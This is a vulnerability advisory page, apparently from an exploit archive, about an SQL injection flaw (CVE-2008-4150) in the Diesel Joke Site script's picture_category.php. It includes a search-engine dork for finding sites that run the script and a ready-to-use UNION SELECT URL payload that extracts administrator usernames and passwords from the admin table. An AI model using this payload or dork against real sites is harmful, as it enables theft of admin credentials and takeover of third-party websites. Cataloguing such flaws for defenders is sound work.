Bug: Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability

Published
Credit
Risk
2008.09.25
sarbot511
High
CWE
CVE
Local
Remote
CWE-89
CVE-2008-4150
No
Yes
 Dork: "All Rights Reserved. Powered by DieselScripts.com"

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

################## sarbot511 #########################################################
#
#
# jokes script Remote SQL Injection Exploit
#
# Founded by : sarbot511
# Dork: "All Rights Reserved. Powered by DieselScripts.com"
#
##### Vuln Code: ###################################################################
#
#
###### Exploit #####################################################################
#
#
http://www.target.com/[path]/picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20adm
in/*
#
###### Greets #######################################################################
#
# Dr.LiNuX , ABO3TB , ALM511 ,master , all my frinds
#
####################################################################################

References:

http://www.milw0rm.com/exploits/6488

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version